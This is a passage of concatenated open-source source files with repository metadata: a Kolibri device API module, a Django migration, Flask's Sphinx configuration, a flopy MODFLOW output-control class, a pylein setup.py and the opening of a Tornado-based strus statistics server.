CHANNEL_UPDATE_STATS_CACHE_KEY.format(instance.id)
)
if "new_resource_count" in include_fields and new_resource_stats:
new_resource_ids = new_resource_stats.get("new_resource_ids")
value["new_resource_count"] = (
len(new_resource_ids) if new_resource_ids is not None else None
)
if "new_resource_total_size" in include_fields and new_resource_stats:
new_resource_stats = process_cache.get(
CHANNEL_UPDATE_STATS_CACHE_KEY.format(instance.id)
)
value["new_resource_total_size"] = new_resource_stats.get(
"new_resource_total_size", None
)
return value
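# Illustrative usage sketch (the endpoint path is an assumption, not defined in
# this module): a request such as
#     GET /api/device/devicechannel/?include_fields=total_resources,total_file_size
# makes the serializer above append the corresponding calculated keys to each
# channel representation.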
class DeviceChannelMetadataViewSet(viewsets.ReadOnlyModelViewSet):
serializer_class = DeviceChannelMetadataSerializer
filter_backends = (DjangoFilterBackend,)
filter_class = ChannelMetadataFilter
permission_classes = (CanManageContent,)
def get_queryset(self):
return ChannelMetadata.objects.all().select_related("root__lang")
class CalculateImportExportSizeView(APIView):
permission_classes = (CanManageContent,)
def post(self, request):
try:
channel_id = self.request.data["channel_id"]
except KeyError:
raise ValidationError(
"channel_id is required for calculating file size and resource counts"
)
drive_id = self.request.data.get("drive_id")
peer_id = self.request.data.get("peer_id")
for_export = self.request.data.get("export")
node_ids = self.request.data.get("node_ids")
exclude_node_ids = self.request.data.get("exclude_node_ids")
flag_count = sum(int(bool(flag)) for flag in (drive_id, peer_id, for_export))
if flag_count > 1:
raise ValidationError(
"Must specify at most one of drive_id, peer_id, and export"
)
# By default filter to unavailable files
available = False
if for_export:
available = True
try:
(
total_resource_count,
_,
total_bytes_to_transfer,
) = get_import_export_data(
channel_id,
node_ids,
exclude_node_ids,
available,
drive_id=drive_id,
peer_id=peer_id,
)
except LocationError:
if drive_id:
raise ValidationError(
"The external drive with given drive id {} does not exist.".format(
drive_id
)
)
if peer_id:
raise ValidationError(
"The network location with the id {} does not exist".format(peer_id)
)
return Response(
{
"resource_count": total_resource_count,
"file_size": total_bytes_to_transfer,
}
)
def validate_uuid(value):
try:
uuid.UUID(value, version=4)
return True
except ValueError:
return False
class DeviceChannelOrderView(APIView):
permission_classes = (CanManageContent,)
def post(self, request, *args, **kwargs):
try:
ids = request.data
if not isinstance(ids, list):
raise AssertionError
if not all(map(validate_uuid, ids)):
raise AssertionError
except AssertionError:
raise ParseError("Array of ids not sent in body of request")
queryset = ChannelMetadata.objects.filter(root__available=True)
total_channels = queryset.count()
if len(ids) != total_channels:
raise ParseError(
"Expected {} ids, but only received {}".format(total_channels, len(ids))
)
if queryset.filter_by_uuids(ids).count() != len(ids):
raise ParseError(
"List of ids does not match the available channels on the server"
)
queryset.update(
order=Case(*(When(id=uuid, then=i + 1) for i, uuid in enumerate(ids)))
)
ContentCacheKey.update_cache_key()
return Response({})
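# Illustrative sketch of the reordering idiom used above (channel ids below are
# placeholders): the POST body is a JSON array holding every available channel
# id in the desired display order, and the view assigns a 1-based `order` via a
# single conditional UPDATE, roughly:
#     ids = ["<uuid-1>", "<uuid-2>", "<uuid-3>"]
#     ChannelMetadata.objects.filter(root__available=True).update(
#         order=Case(*(When(id=pk, then=pos + 1) for pos, pk in enumerate(ids)))
#     )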
| {
"content_hash": "a8dd435bfb759a39b227ec6b3f89a5b5",
"timestamp": "",
"source": "github",
"line_count": 191,
"max_line_length": 121,
"avg_line_length": 40.973821989528794,
"alnum_prop": 0.6055456171735242,
"repo_name": "learningequality/kolibri",
"id": "e7aa42c077b6b0ecd3ddd8de31936c651e6bd21d",
"size": "7826",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "kolibri/plugins/device/api.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "3095586"
},
{
"name": "Dockerfile",
"bytes": "3559"
},
{
"name": "Gherkin",
"bytes": "996801"
},
{
"name": "HTML",
"bytes": "22573"
},
{
"name": "JavaScript",
"bytes": "2233801"
},
{
"name": "Makefile",
"bytes": "12972"
},
{
"name": "Python",
"bytes": "3652744"
},
{
"name": "SCSS",
"bytes": "8551"
},
{
"name": "Shell",
"bytes": "3867"
},
{
"name": "Vue",
"bytes": "2193917"
}
],
"symlink_target": ""
} |
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('scheduler', '0007_scheduler_num_message_handlers'),
]
operations = [
migrations.AlterField(
model_name='scheduler',
name='num_message_handlers',
field=models.IntegerField(default=1),
),
]
| {
"content_hash": "be2ea75eaa99a297c91f45efdaa9ab56",
"timestamp": "",
"source": "github",
"line_count": 18,
"max_line_length": 61,
"avg_line_length": 22.666666666666668,
"alnum_prop": 0.6151960784313726,
"repo_name": "ngageoint/scale",
"id": "3f16ffcf7fe017e892f2e434b3f71c81746900af",
"size": "481",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "scale/scheduler/migrations/0008_auto_20171103_1334.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "7219"
},
{
"name": "CSS",
"bytes": "12193"
},
{
"name": "Dockerfile",
"bytes": "14853"
},
{
"name": "HCL",
"bytes": "301"
},
{
"name": "HTML",
"bytes": "48818"
},
{
"name": "JavaScript",
"bytes": "503"
},
{
"name": "Makefile",
"bytes": "5852"
},
{
"name": "Python",
"bytes": "5295677"
},
{
"name": "Shell",
"bytes": "26650"
}
],
"symlink_target": ""
} |
from __future__ import print_function
import os
import sys
import pkg_resources
import time
import datetime
BUILD_DATE = datetime.datetime.utcfromtimestamp(int(os.environ.get('SOURCE_DATE_EPOCH', time.time())))
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.append(os.path.join(os.path.dirname(__file__), '_themes'))
sys.path.append(os.path.dirname(__file__))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.intersphinx',
'flaskdocext'
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Flask'
copyright = u'2010 - {0}, Armin Ronacher'.format(BUILD_DATE.year)
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
try:
release = pkg_resources.get_distribution('Flask').version
except pkg_resources.DistributionNotFound:
print('Flask must be installed to build the documentation.')
print('Install from source using `pip install -e .` in a virtualenv.')
sys.exit(1)
if 'dev' in release:
release = ''.join(release.partition('dev')[:2])
version = '.'.join(release.split('.')[:2])
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. Major themes that come with
# Sphinx are currently 'default' and 'sphinxdoc'.
# html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
# html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
html_theme_path = ['_themes']
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar. Do not set, template magic!
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
html_favicon = '_static/flask-favicon.ico'
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
html_sidebars = {
'index': [
'sidebarintro.html',
'sourcelink.html',
'searchbox.html'
],
'**': [
'sidebarlogo.html',
'localtoc.html',
'relations.html',
'sourcelink.html',
'searchbox.html'
]
}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
html_use_modindex = False
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
html_show_sphinx = False
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = ''
# Output file base name for HTML help builder.
htmlhelp_basename = 'Flaskdoc'
# -- Options for LaTeX output --------------------------------------------------
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('latexindex', 'Flask.tex', u'Flask Documentation', u'Armin Ronacher', 'manual'),
]
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
latex_use_modindex = False
latex_elements = {
'fontpkg': r'\usepackage{mathpazo}',
'papersize': 'a4paper',
'pointsize': '12pt',
'preamble': r'\usepackage{flaskstyle}'
}
latex_use_parts = True
latex_additional_files = ['flaskstyle.sty', 'logo.pdf']
# -- Options for Epub output ---------------------------------------------------
# Bibliographic Dublin Core info.
#epub_title = ''
#epub_author = ''
#epub_publisher = ''
#epub_copyright = ''
# The language of the text. It defaults to the language option
# or en if the language is not set.
#epub_language = ''
# The scheme of the identifier. Typical schemes are ISBN or URL.
#epub_scheme = ''
# The unique identifier of the text. This can be a ISBN number
# or the project homepage.
#epub_identifier = ''
# A unique identification for the text.
#epub_uid = ''
# HTML files that should be inserted before the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_pre_files = []
# HTML files shat should be inserted after the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_post_files = []
# A list of files that should not be packed into the epub file.
#epub_exclude_files = []
# The depth of the table of contents in toc.ncx.
#epub_tocdepth = 3
intersphinx_mapping = {
'python': ('https://docs.python.org/3/', None),
'werkzeug': ('http://werkzeug.pocoo.org/docs/', None),
'click': ('http://click.pocoo.org/', None),
'jinja': ('http://jinja.pocoo.org/docs/', None),
'sqlalchemy': ('http://docs.sqlalchemy.org/en/latest/', None),
'wtforms': ('https://wtforms.readthedocs.io/en/latest/', None),
'blinker': ('https://pythonhosted.org/blinker/', None)
}
try:
__import__('flask_theme_support')
pygments_style = 'flask_theme_support.FlaskyStyle'
html_theme = 'flask'
html_theme_options = {
'touch_icon': 'touch-icon.png'
}
except ImportError:
print('-' * 74)
print('Warning: Flask themes unavailable. Building with default theme')
print('If you want the Flask themes, run this command and build again:')
print()
print(' git submodule update --init')
print('-' * 74)
# unwrap decorators
def unwrap_decorators():
import sphinx.util.inspect as inspect
import functools
old_getargspec = inspect.getargspec
def getargspec(x):
return old_getargspec(getattr(x, '_original_function', x))
inspect.getargspec = getargspec
old_update_wrapper = functools.update_wrapper
def update_wrapper(wrapper, wrapped, *a, **kw):
rv = old_update_wrapper(wrapper, wrapped, *a, **kw)
rv._original_function = wrapped
return rv
functools.update_wrapper = update_wrapper
unwrap_decorators()
del unwrap_decorators
| {
"content_hash": "e6d2f3a7379e88fbacee10459424e4cc",
"timestamp": "",
"source": "github",
"line_count": 290,
"max_line_length": 102,
"avg_line_length": 32.179310344827584,
"alnum_prop": 0.6899914273467638,
"repo_name": "auready/flask",
"id": "81106a3ac744c007d095081a47d20aff06ee7172",
"size": "9747",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "docs/conf.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "18"
},
{
"name": "HTML",
"bytes": "404"
},
{
"name": "Makefile",
"bytes": "1603"
},
{
"name": "Python",
"bytes": "453630"
}
],
"symlink_target": ""
} |
"""
mfoc88 module. Contains the ModflowOc88 class. Note that the user can access
the ModflowOc88 class as `flopy.modflow.ModflowOc88`.
Additional information for this MODFLOW package can be found at the `Online
MODFLOW Guide
<http://water.usgs.gov/ogw/modflow/MODFLOW-2005-Guide/index.html?oc.htm>`_.
"""
import sys
from ..pakbase import Package
class ModflowOc88(Package):
"""
MODFLOW Output Control Package Class.
Parameters
----------
model : model object
The model object (of type :class:`flopy.modflow.mf.Modflow`) to which
this package will be added.
ihedfm : int
is a code for the format in which heads will be printed.
(default is 0).
iddnfm : int
        is a code for the format in which drawdowns will be printed.
(default is 0).
item2 : list of ints
[incode, ihddfl, ibudfl, icbcfl], where incode is the code for reading
Item 3. ihddfl is a head and drawdown output flag. This flag allows
Item 3 flags to be specified in an early time step and then used or not
used in subsequent time steps. Thus, it may be possible to use IHDDFL
to avoid resetting Item 3 flags every time step. ibudfl is a budget
print flag. icbcfl is a flag for writing cell-by-cell flow data.
(default is [[0, 1, 0, 1]]).
item3 : list of ints
[hdpr, ddpr, hdsv, ddsv]
hdpr is the output flag for head printout.
ddpr is the output flag for drawdown printout.
hdsv is the output flag for head save.
ddsv is the output flag for drawdown save.
(default is [[0, 0, 1, 0]]).
extension : list of strings
(default is ['oc','hds','ddn','cbc']).
unitnumber : list of ints
(default is [14, 51, 52, 53]).
save_head_every : int
Time step interval for printing and/or saving results
(default is None).
words : list of instructions
Can be specified as a 2d list of the following form::
[[per,stp,'head','drawdown','budget','pbudget', 'phead']]
In this 2d form, phead, pbudget will print the head and budget.
Words can also be a 1d list of data items, such as::
['head','drawdown','budget'].
With a 1d list, the save_head_every option is used to determine the
output frequency.
(default is None).
compact : boolean
Save results in compact budget form. (default is False).
chedfm : string
is a character value that specifies the format for saving heads, and
can only be specified if the word method of output control is used.
The format must contain 20 characters or less and must be a valid
Fortran format that is enclosed in parentheses. The format must be
enclosed in apostrophes if it contains one or more blanks or commas.
The optional word LABEL after the format is used to indicate that
each layer of output should be preceded with a line that defines the
output (simulation time, the layer being output, and so forth). If
there is no record specifying CHEDFM, then heads are written to a
binary (unformatted) file. Binary files are usually more compact than
text files, but they are not generally transportable among different
computer operating systems or different Fortran compilers.
cddnfm : string
is a character value that specifies the format for saving drawdown, and
can only be specified if the word method of output control is used.
The format must contain 20 characters or less and must be a valid
Fortran format that is enclosed in parentheses. The format must be
enclosed in apostrophes if it contains one or more blanks or commas.
The optional word LABEL after the format is used to indicate that
each layer of output should be preceded with a line that defines the
output (simulation time, the layer being output, and so forth). If
there is no record specifying CDDNFM, then drawdowns are written to a
binary (unformatted) file. Binary files are usually more compact than
text files, but they are not generally transportable among different
computer operating systems or different Fortran compilers.
Attributes
----------
Methods
-------
See Also
--------
Notes
-----
The "words" method for specifying output control is preferred in most
cases. Also, the "compact" budget should normally be used as it produces
files that are typically much smaller. The compact budget form is also
a requirement for using the MODPATH particle tracking program.
Examples
--------
>>> import flopy
>>> m = flopy.modflow.Modflow()
>>> oc = flopy.modflow.ModflowOc88(m, words=['head'], save_head_every=1)
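    A numeric-codes setup (no words) that saves heads every other time step
    could look like this (illustrative sketch, assuming a DIS package is
    already attached to the model):
    >>> oc2 = flopy.modflow.ModflowOc88(m, save_head_every=2)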
"""
def __init__(self, model, ihedfm=0, iddnfm=0, item2=[[0, 1, 0, 1]], \
item3=[[0, 0, 1, 0]], extension=['oc', 'hds', 'ddn', 'cbc'], \
unitnumber=[14, 51, 52, 53], save_head_every=None, \
words=None, compact=False, chedfm=None, cddnfm=None):
# Call ancestor's init to set self.parent,
# extension, name and unit number
hds_fmt = 'DATA(BINARY)'
ddn_fmt = 'DATA(BINARY)'
if chedfm is not None:
hds_fmt = 'DATA'
if cddnfm is not None:
ddn_fmt = 'DATA'
Package.__init__(self, model, extension, \
['OC', hds_fmt, ddn_fmt, \
'DATA(BINARY)'], unitnumber, \
extra=['', 'REPLACE', 'REPLACE', 'REPLACE'])
self.heading = '# Output control package file' + \
' for MODFLOW, generated by Flopy.'
if words is not None:
self.heading += ' Output control by words option'
self.heading += '\n# Deprecated flopy OC class'
print('Warning: ModflowOc88 flopy class is deprecated')
print(' Please use ModflowOc class')
self.url = 'oc.htm'
self.ihedfm = ihedfm
self.iddnfm = iddnfm
self.chedfm = chedfm
self.cddnfm = cddnfm
# using words
if words is not None:
hflag, dflag = False, False
if 'head' in words and ihedfm != 0:
hflag = True
if 'drawdown' in words and iddnfm != 0:
dflag = True
self.words = []
self.compact = compact
# first try for simple 1-d list
try:
for w in words:
self.words.append(w.upper())
# build a list of word output options
word_list = []
if save_head_every is None:
raise TypeError('to use the 1d words OC option, save_head_every must be used')
nstp = self.parent.get_package('DIS').nstp
for p in range(len(nstp)):
for s in range(nstp[p]):
if s % save_head_every == 0:
word_list.append('PERIOD {0:5.0f} STEP {1:5.0f}\n' \
.format(p + 1, s + 1))
for w in words:
if 'PBUDGET' in w.upper():
word_list.append(' PRINT BUDGET\n')
elif 'PHEAD' in w.upper():
word_list.append(' PRINT HEAD\n')
else:
word_list.append(' SAVE ' + w.upper() + '\n')
if hflag:
word_list.append(' PRINT HEAD\n')
if dflag:
word_list.append(' PRINT DRAWDOWN\n')
word_list.append('\n')
self.word_list = word_list
# try for a 2-d list
except:
word_list = []
self.words = []
for i in words:
p, s = int(i[0]), int(i[1])
wwords = i[2:]
                    word_list.append('PERIOD {0:5.0f} STEP {1:5.0f}\n' \
.format(p, s))
for w in wwords:
if 'PBUDGET' in w.upper():
word_list.append(' PRINT BUDGET\n')
elif 'PHEAD' in w.upper():
word_list.append(' PRINT HEAD\n')
else:
word_list.append(' SAVE ' + w.upper() + '\n')
if w.upper() not in self.words:
self.words.append(w.upper())
if hflag:
word_list.append(' PRINT HEAD\n')
if dflag:
word_list.append(' PRINT DRAWDOWN\n')
word_list.append('\n')
self.word_list = (word_list)
# numeric codes
else:
self.words = None
# dummy, self.item2 = self.assign_layer_row_column_data(item2, 4, zerobase=False) # misuse of this function - zerobase needs to be False
if (item2 != None):
error_message = 'item2 must have 4 columns'
if (not isinstance(item2, list)):
item2 = [item2]
for a in item2:
assert len(a) == 4, error_message
self.item2 = item2
if (item3 != None):
error_message = 'item3 must have 4 columns'
if (not isinstance(item3, list)):
item3 = [item3]
for a in item3:
assert len(a) == 4, error_message
self.item3 = item3
if save_head_every is not None:
nstp = self.parent.get_package('DIS').nstp
self.item3 = []
# len(nstp) is the number of stress periods
for p in range(len(nstp)):
for s in range(1, nstp[p] + 1):
if s % save_head_every == 0:
self.item3.append([0, 0, 1, 0])
else:
self.item3.append([0, 0, 0, 0])
self.parent.add_package(self)
def write_file(self):
"""
Write the package file.
Returns
-------
None
"""
f_oc = open(self.fn_path, 'w')
f_oc.write('%s\n' % self.heading)
nstp = self.parent.get_package('DIS').nstp
# words option
if self.words is not None:
f_oc.write('HEAD PRINT FORMAT {0:3.0f}\n' \
.format(self.ihedfm))
if self.chedfm is not None:
f_oc.write('HEAD SAVE FORMAT {0:20s} LABEL\n' \
.format(self.chedfm))
f_oc.write('HEAD SAVE UNIT {0:5.0f}\n' \
.format(self.unit_number[1]))
f_oc.write('DRAWDOWN PRINT FORMAT {0:3.0f}\n' \
.format(self.iddnfm))
if self.cddnfm is not None:
f_oc.write('DRAWDOWN SAVE FORMAT {0:20s} LABEL\n' \
.format(self.cddnfm))
f_oc.write('DRAWDOWN SAVE UNIT {0:5.0f}\n' \
.format(self.unit_number[2]))
if self.compact:
f_oc.write('COMPACT BUDGET FILES')
f_oc.write('\n')
for i in self.word_list:
f_oc.write(i)
# numeric codes option
else:
f_oc.write('%3i%3i%5i%5i\n' % \
(self.ihedfm, self.iddnfm, self.unit_number[1], \
self.unit_number[2]))
ss = 0
# len(nstp) is the number of stress periods
for p in range(len(nstp)):
for s in range(nstp[p]):
if (ss < len(self.item2)):
a = self.item2[ss]
else:
a = self.item2[-1]
if (ss < len(self.item3)):
b = self.item3[ss]
else:
b = self.item3[-1]
f_oc.write('%3i%3i%3i%3i Period %3i, step %3i\n' \
% (a[0], a[1], a[2], a[3], p + 1, s + 1))
# incode > 0 means that item3 must have one record for each
# layer, so perform check here
if (a[0] > 0):
                        nlay = self.parent.get_package('DIS').nlay
                        nr = len(b)
                        assert nr == nlay, 'item3 must have {0:1d} rows when incode > 0'.format(nlay)
for bb in b:
f_oc.write('%3i%3i%3i%3i\n' % (bb[0], bb[1], bb[2], bb[3]))
else:
f_oc.write('%3i%3i%3i%3i\n' % (b[0], b[1], b[2], b[3]))
ss = ss + 1
f_oc.close()
@staticmethod
def load(f, model, nper=None, ext_unit_dict=None):
"""
Load an existing package.
Parameters
----------
f : filename or file handle
File to load.
model : model object
The model object (of type :class:`flopy.modflow.mf.Modflow`) to
which this package will be added.
nper : int
The number of stress periods. If nper is None, then nper will be
obtained from the model object. (default is None).
ext_unit_dict : dictionary, optional
If the arrays in the file are specified using EXTERNAL,
or older style array control records, then `f` should be a file
handle. In this case ext_unit_dict is required, which can be
constructed using the function
:class:`flopy.utils.mfreadnam.parsenamefile`.
Returns
-------
oc : ModflowOc object
ModflowOc object.
Examples
--------
>>> import flopy
>>> m = flopy.modflow.Modflow()
>>> oc = flopy.modflow.ModflowOc.load('test.oc', m)
"""
if model.verbose:
sys.stdout.write('loading oc package file...\n')
if nper is None:
nrow, ncol, nlay, nper = model.get_nrow_ncol_nlay_nper()
# initialize
ihedfm = 0
iddnfm = 0
ihedun = 0
iddnun = 0
compact = False
chedfm = None
cddnfm = None
words = []
wordrec = []
# open file
if not hasattr(f, 'read'):
filename = f
f = open(filename, 'r')
# process each line
for line in f:
lnlst = line.strip().split()
if line[0] == '#':
continue
# added by JJS 12/12/14 to avoid error when there is a blank line in the OC file
if lnlst == []:
continue
# end add
# dataset 1 values
elif ('HEAD' in lnlst[0].upper() and
'PRINT' in lnlst[1].upper() and
'FORMAT' in lnlst[2].upper()
):
ihedfm = int(lnlst[3])
elif ('HEAD' in lnlst[0].upper() and
'SAVE' in lnlst[1].upper() and
'FORMAT' in lnlst[2].upper()
):
chedfm = lnlst[3]
elif ('HEAD' in lnlst[0].upper() and
'SAVE' in lnlst[1].upper() and
'UNIT' in lnlst[2].upper()
):
ihedun = int(lnlst[3])
elif ('DRAWDOWN' in lnlst[0].upper() and
'PRINT' in lnlst[1].upper() and
'FORMAT' in lnlst[2].upper()
):
iddnfm = int(lnlst[3])
elif ('DRAWDOWN' in lnlst[0].upper() and
'SAVE' in lnlst[1].upper() and
'FORMAT' in lnlst[2].upper()
):
cddnfm = lnlst[3]
elif ('DRAWDOWN' in lnlst[0].upper() and
'SAVE' in lnlst[1].upper() and
'UNIT' in lnlst[2].upper()
):
iddnun = int(lnlst[3])
elif ('IBOUND' in lnlst[0].upper() and
'SAVE' in lnlst[1].upper() and
'FORMAT' in lnlst[2].upper()
):
cboufm = lnlst[3]
elif ('IBOUND' in lnlst[0].upper() and
'SAVE' in lnlst[1].upper() and
'UNIT' in lnlst[2].upper()
):
ibouun = int(lnlst[3])
elif 'COMPACT' in lnlst[0].upper():
compact = True
# dataset 2
elif 'PERIOD' in lnlst[0].upper():
if len(wordrec) > 3:
words.append(wordrec)
iperoc = int(lnlst[1])
itsoc = int(lnlst[3])
wordrec = [iperoc, itsoc]
# dataset 3
elif 'PRINT' in lnlst[0].upper() and 'HEAD' in lnlst[1].upper():
wordrec.append('PHEAD')
elif ('PRINT' in lnlst[0].upper() and
'DRAWDOWN' in lnlst[1].upper()):
wordrec.append('PDRAWDOWN')
elif 'PRINT' in lnlst[0].upper() and 'BUDGET' in lnlst[1].upper():
wordrec.append('PBUDGET')
elif 'SAVE' in lnlst[0].upper() and 'HEAD' in lnlst[1].upper():
wordrec.append('HEAD')
elif ('SAVE' in lnlst[0].upper() and
'DRAWDOWN' in lnlst[1].upper()):
wordrec.append('DRAWDOWN')
elif 'SAVE' in lnlst[0].upper() and 'IBOUND' in lnlst[1].upper():
wordrec.append('IBOUND')
elif 'SAVE' in lnlst[0].upper() and 'BUDGET' in lnlst[1].upper():
wordrec.append('BUDGET')
else:
print('Old style oc files not supported for import.')
print('Convert to words.')
return ModflowOc88(model)
# store the last record in word
if len(wordrec) > 3:
words.append(wordrec)
# reset unit numbers
unitnumber = [14, 51, 52, 53]
if ihedun > 0:
model.add_pop_key_list(ihedun)
# unitnumber[1] = ihedun
if iddnun > 0:
model.add_pop_key_list(iddnun)
# unitnumber[2] = iddnun
# create instance of oc class
oc = ModflowOc88(model, ihedfm=ihedfm, iddnfm=iddnfm,
extension=['oc', 'hds', 'ddn', 'cbc'],
unitnumber=unitnumber, words=words, compact=compact,
chedfm=chedfm, cddnfm=cddnfm)
return oc
| {
"content_hash": "e7718aa7f27cfe0c0af208522554018a",
"timestamp": "",
"source": "github",
"line_count": 484,
"max_line_length": 149,
"avg_line_length": 40.28719008264463,
"alnum_prop": 0.477152674496128,
"repo_name": "mrustl/flopy",
"id": "669b3fd07cf0b1222523d8ce8732afbb93897e6c",
"size": "19499",
"binary": false,
"copies": "1",
"ref": "refs/heads/kwb",
"path": "flopy/modflow/mfoc88.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "71"
},
{
"name": "Python",
"bytes": "1772821"
},
{
"name": "Visual Basic",
"bytes": "3938"
}
],
"symlink_target": ""
} |
from setuptools import setup, find_packages
setup(name = "pylein",
version = "0.1",
description = "Setup python projects painlessly",
url = "https://github.com/harshadss/pylein",
author = "Harshad Saykhedkar",
license = "BSD 3-Clause License",
packages = find_packages(),
test_suite = "nose.collector",
tests_require = ['nose'],
entry_points = {
"console_scripts": ['pylein-run = pylein.__main__:main']
} )
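# Installing this package (illustrative): `pip install -e .` registers the
# console script declared above, so running `pylein-run` invokes
# pylein.__main__:main.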
| {
"content_hash": "b67ee33766c269d4aebfe808ea63766c",
"timestamp": "",
"source": "github",
"line_count": 14,
"max_line_length": 64,
"avg_line_length": 34.07142857142857,
"alnum_prop": 0.59958071278826,
"repo_name": "harshadss/pylein",
"id": "d40fa96bce100c6fced9bb3e02c67a8fea5021b1",
"size": "477",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "6460"
}
],
"symlink_target": ""
} |
import tornado.ioloop
import tornado.web
import optparse
import os
import sys
import binascii
import struct
import strus
import collections
import strusMessage
# [1] Globals:
# Term df map:
termDfMap = {}
# Collection size (number of documents):
collectionSize = 0
# Strus statistics message processor:
strusctx = strus.Context()
# [2] Request handlers
def packedMessage( msg):
return struct.pack( ">H%ds" % len(msg), len(msg), msg)
def termDfMapKey( type, value):
return "%s~%s" % (type,value)
@tornado.gen.coroutine
def processCommand( message):
rt = b"Y"
try:
global collectionSize
global termDfMap
if (message[0] == ord('P')):
# PUBLISH:
statview = strusctx.unpackStatisticBlob( message[1:])
collectionSize += statview[ "nofdocs"]
for dfchg in statview[ "dfchange"]:
key = termDfMapKey( dfchg['type'], dfchg['value'])
if key in termDfMap:
termDfMap[ key ] += int( dfchg['increment'])
else:
termDfMap[ key ] = int( dfchg['increment'])
elif (message[0] == ord('Q')):
# QUERY:
messagesize = len(message)
messageofs = 1
while (messageofs < messagesize):
if (message[ messageofs] == ord('T')):
# Fetch df of term, message format [T][typesize:16][valuesize:16][type string][value string]:
(typesize,valuesize) = struct.unpack_from( ">HH", message, messageofs+1)
messageofs += struct.calcsize( ">HH") + 1
(type,value) = struct.unpack_from( "%ds%ds" % (typesize,valuesize), message, messageofs)
messageofs += typesize + valuesize
df = 0
key = termDfMapKey( type, value)
if key in termDfMap:
df = termDfMap[ key]
rt += struct.pack( ">q", df)
elif (message[ messageofs] == ord('N')):
# Fetch N (nof documents), message format [N]:
messageofs += 1
rt += struct.pack( ">q", collectionSize)
else:
raise Exception( "unknown statistics server sub command")
else:
raise Exception( "unknown statistics server command")
except Exception as e:
raise tornado.gen.Return( b"E" + str(e).encode('utf-8'))
raise tornado.gen.Return( rt)
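# Illustrative client-side sketch (not part of the original server): packing a
# 'Q' query message that processCommand() above understands -- one 'T' record
# per term df request, plus an optional trailing 'N' for the collection size.
def packQueryMessage( terms, withCollectionSize=True):
    msg = b"Q"
    for (termtype, termvalue) in terms:
        typebytes = termtype.encode('utf-8')
        valuebytes = termvalue.encode('utf-8')
        msg += b"T" + struct.pack( ">HH", len(typebytes), len(valuebytes))
        msg += typebytes + valuebytes
    if withCollectionSize:
        msg += b"N"
    return msg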
def processShutdown():
pass
# [5] Server main:
if __name__ == "__main__":
try:
# Parse arguments:
parser = optparse.OptionParser()
parser.add_option("-p", "--port", dest="port", default=7183,
help="Specify the port of this server as PORT (default %u)" % 7183,
metavar="PORT")
(options, args) = parser.parse_args()
if len(args) > 0:
parser.error("no arguments expected")
parser.print_help()
myport = int(options.port)
# Start server:
print( "Starting server ...")
